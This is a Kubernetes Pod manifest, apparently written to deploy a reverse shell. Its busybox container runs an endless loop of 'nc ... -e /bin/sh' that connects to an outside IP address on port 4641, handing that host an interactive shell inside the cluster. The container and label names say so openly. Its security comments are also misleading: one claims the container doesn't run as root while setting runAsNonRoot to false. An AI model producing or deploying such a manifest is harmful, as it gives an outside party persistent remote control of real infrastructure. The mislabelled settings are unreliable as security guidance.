apiVersion: v1
kind: Pod
metadata:
  name: cyerspod
  namespace: nati  # Ensure the namespace is correct
  labels:
    app: nc
spec:
  serviceAccountName: cyerspod-sa  # Attach the correct ServiceAccount
  containers:
  - name: cyereverseshell
    image: busybox
    args: ["sh", "-c", "while true; do nc 68.183.22.232 4641 -e /bin/sh; sleep 10; done"]
    securityContext:
      allowPrivilegeEscalation: false  # Required by PodSecurity policy
      runAsNonRoot: false  # Ensure the container doesn't run as root
      capabilities:
        drop: ["ALL"]  # Drop all unnecessary capabilities
      seccompProfile:
        type: RuntimeDefault  # Enforce the default seccomp profile
